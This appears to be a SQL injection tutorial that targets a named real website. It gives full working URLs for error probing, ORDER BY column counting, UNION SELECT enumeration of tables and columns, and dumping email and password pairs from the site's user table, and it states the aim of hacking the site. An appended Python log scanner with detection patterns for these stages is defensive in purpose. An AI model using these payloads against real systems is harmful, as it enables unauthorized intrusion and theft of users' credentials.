SQL INJECTION

I have a vulnerable website:

http://www.morephotosradio.com/transcript.php?interview_id=2021

To check whether this website is vulnerable, put a ' sign at the end of the link, like this:

==> http://www.morephotosradio.com/transcript.php?interview_id=2021'

The page will show an SQL error like this.

==> Find the number of columns by using an order by --+ query, like this:

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 1--+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 7--+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 15--+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 30--+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 45--+ No Error

http://www.morephotosradio.com/transcript.php?interview_id=2021 order by 47--+ Error

==> This error shows that the query returns 46 columns.

==> Now remove the order by clause, go to UNION Based in HackBar, and click on the union+all+select statement.

==> A small box will open. In that box, type the number of columns; for this website it is 46.

==> Also place a - sign before the parameter id, like this: (id=-2021)

==> Press Execute. Some numbers will be shown on the page, as you can see in the image above. Replace any one of those numbers with group_concat(table_name) and write from information_schema.tables where table_schema=database()--+ at the end of the URL.

To find the table information:

http://www.morephotosradio.com/transcript.php?interview_id=-2021 UNION SELECT 1,2,3,4,5,group_concat(table_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46+from+information_schema.tables+where+table_schema=database()--+

==> The page will show all the table names. We want to hack the website, so we need to find the admin username and password.

==> Now remove database() from the query and go to sql basics, then char(), and then mysqlchar. A small window will open.

==> In that window, type a table name such as admin, user or member. I will type user because my admin table name is user.

==> Click OK. Now replace the following parts of the query:

group_concat(table_name) to group_concat(column_name)

table_schema to table_name

information_schema.tables to information_schema.columns

database() is already removed, and the MySQL char encoding of user is placed where user would go.

==> The query for columns will become like this:

http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(column_name),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from information_Schema.columns where table_name=CHAR(117, 115, 101, 114)--+

Press Execute

==> Now we need the admin email and passwords.

Replace column_name with any column names you need, like email and password, and at the end of the URL write from user, like this:

http://www.morephotosradio.com/transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,3,4,5,group_concat(email,0x3a,password),7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43,44,45,46 from user--+

Press Execute
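
Every stage of this walkthrough sends a non-integer value in interview_id, so the sequence stands out in the web server's access log. The Python sketch below is an added example, not part of the original post: it flags such requests and labels the stage by pattern. The NUMERIC_PARAMS set, the log format, the client addresses and the sample lines are constructed assumptions.

```python
import re
from collections import defaultdict
from urllib.parse import urlsplit, parse_qsl

# Assumption: parameters the application expects to be plain integers.
NUMERIC_PARAMS = {"interview_id"}

# Patterns drawn from the request shapes shown in this walkthrough.
SIGNATURES = {
    "quote_probe": re.compile(r"'"),
    "order_by_probe": re.compile(r"\border\s+by\s+\d+", re.I),
    "union_select": re.compile(r"\bunion\s+(?:all\s+)?select\b", re.I),
    "schema_enum": re.compile(r"\binformation_schema\.(?:tables|columns)\b", re.I),
    "group_concat": re.compile(r"\bgroup_concat\s*\(", re.I),
    "char_encoding": re.compile(r"\bchar\s*\(\s*\d+(?:\s*,\s*\d+)*\s*\)", re.I),
    "comment_tail": re.compile(r"--\s*$"),
}
REQUEST = re.compile(r'^(\S+) .*?"(?:GET|POST) (\S+) HTTP/[\d.]+"')

def classify(value):
    """Return the names of all signatures found in a decoded parameter value."""
    return sorted(name for name, rx in SIGNATURES.items() if rx.search(value))

def scan(log_lines):
    """Map client IP -> [(parameter, labels)] for non-integer numeric parameters."""
    findings = defaultdict(list)
    for line in log_lines:
        m = REQUEST.match(line)
        if not m:
            continue
        client, target = m.groups()
        # parse_qsl decodes %xx and turns '+' into a space, as the server would.
        for name, value in parse_qsl(urlsplit(target).query):
            if name in NUMERIC_PARAMS and not re.fullmatch(r"[0-9]+", value):
                findings[client].append((name, classify(value) or ["non_integer"]))
    return dict(findings)

# Constructed sample lines (combined log format); addresses are documentation ranges.
SAMPLE_LOG = [
    '198.51.100.20 - - [01/Jan/2024:10:00:00 +0000] "GET /transcript.php?interview_id=2021 HTTP/1.1" 200 5120',
    '203.0.113.7 - - [01/Jan/2024:10:01:00 +0000] "GET /transcript.php?interview_id=2021%27 HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:02:00 +0000] "GET /transcript.php?interview_id=2021+order+by+47--+ HTTP/1.1" 200 310',
    '203.0.113.7 - - [01/Jan/2024:10:03:00 +0000] "GET /transcript.php?interview_id=-2021+UNION+ALL+SELECT+1,2,group_concat(column_name)+from+information_schema.columns+where+table_name=CHAR(117,115,101,114)--+ HTTP/1.1" 200 900',
]

if __name__ == "__main__":
    for client, hits in scan(SAMPLE_LOG).items():
        for name, labels in hits:
            print(client, name, ",".join(labels))
```

Detection of this kind is a backstop: binding interview_id as an integer in a prepared statement keeps all of these values away from the SQL parser in the first place.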
